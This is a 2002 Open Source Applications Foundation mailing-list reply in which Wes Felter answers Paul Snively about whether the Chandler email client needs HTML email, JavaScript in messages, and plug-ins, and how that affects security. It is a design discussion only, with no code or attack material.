Open Source Applications Foundation

[Dev] Re: [Design] Obvious Scripting Security Notes

Wes Felter Sun, 03 Nov 2002 19:14:52 -0600 

on 11/3/02 6:18 PM, Paul Snively at psnively@earthlink.net wrote:

>> I don't see how Chandler can NOT not do HTML email.  Plug-ins are
>> vital as well.
>> 
> *sigh* OK; I was afraid of this. I have to say that if you accept this
> combination as  a pair of requirements, and probably also insist on
> supporting JavaScript in the HTML with backward compatibility with MSIE
> and/or Outlook, then you will inherit the complete lack of any kind of
> security focus that MSIE and/or Outlook suffers from, plus you'll open
> new vectors of attack to the extent that this gaping hole is embedded
> into the rest of Chandler.

I don't agree. Entourage supports HTML mail, and it probably supports JS in
mail, but I've never heard of any security holes due to this. It seems
simple enough to declare that JS inside a message cannot see or modify
*anything* outside of that message, and my intuition is that this will
support all use cases. Such a security model has the advantage that it
doesn't need to be configurable.

>> I know it's a challenge, so let's start working on it.
> 
> Quite right. Perhaps we should begin by drafting as comprehensive a set
> of use-cases for Chandler as possible, and articulate some functional
> requirements. For example, I wouldn't have expected "HTML e-mail" to be
> a requirement; as far as I can tell, HTML e-mail is used only for spam,
> and that primarily so that web-bugs can be used to track who actually
> reads the e-mail.

I tend to agree here. I've only seen two kinds of HTML email:

* Simple HTML (no images, no JS) from people who are using OE with default
settings.
* Hostile mail (spam, viruses, etc.)

So based on these use cases, I see no need for JS support at all.

I can imagine use cases for the "enterprise" market that would require JS,
such as form-based workflow. But does that apply to Chandler?

> Supporting browser plug-ins makes it quite literally
> impossible to make any strong security claims at all.

I think Mitch said plug-ins, not Web browser plug-ins. I would appreciate
the ability to view attachments inline and I don't see how this introduces
any security implications.

[unnecessary capabilities advocacy snipped :-)]

Wes Felter - wesley@felter.org - http://felter.org/wesley/